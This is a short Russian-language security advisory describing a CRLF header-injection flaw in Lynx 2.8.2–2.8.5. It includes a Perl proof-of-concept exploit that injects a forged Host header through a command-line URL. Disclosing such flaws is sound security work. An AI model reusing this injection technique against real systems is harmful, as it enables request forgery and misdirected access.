Уязвимость внедрения CRLF, обнаруженная в Lynx, позволяет атакующему внедрять дополнительные HTTP заголовки в просматриваемые страницы. Если Lynx вызывается
из командной строки, символ CRLF может быть включен в указанный URL. Эти символы не фильтруются при создании HTTP запроса. Например, если атакующий изменил заголовок 'Host', запрос будет обслуживаться так, как будто он был сделан в другом домене, тем самым обеспечивая
нападающему большие привилегии.
Эксплоит:
#!/usr/bin/perl --
# Ulf Harnhammar 2002
# example: ./exploit www.site1.st www.site2.st
# will show www.site2.st
die "$0 hostone hosttwo\n" if @ARGV != 2;
exec('lynx "'.
"http://$ARGV[0]/ HTTP/1.0\012".
"Host: $ARGV[1]\012\012".
'"');
Уязвимость обнаружена в University of Kansas Lynx 2.8.2-2.8.5.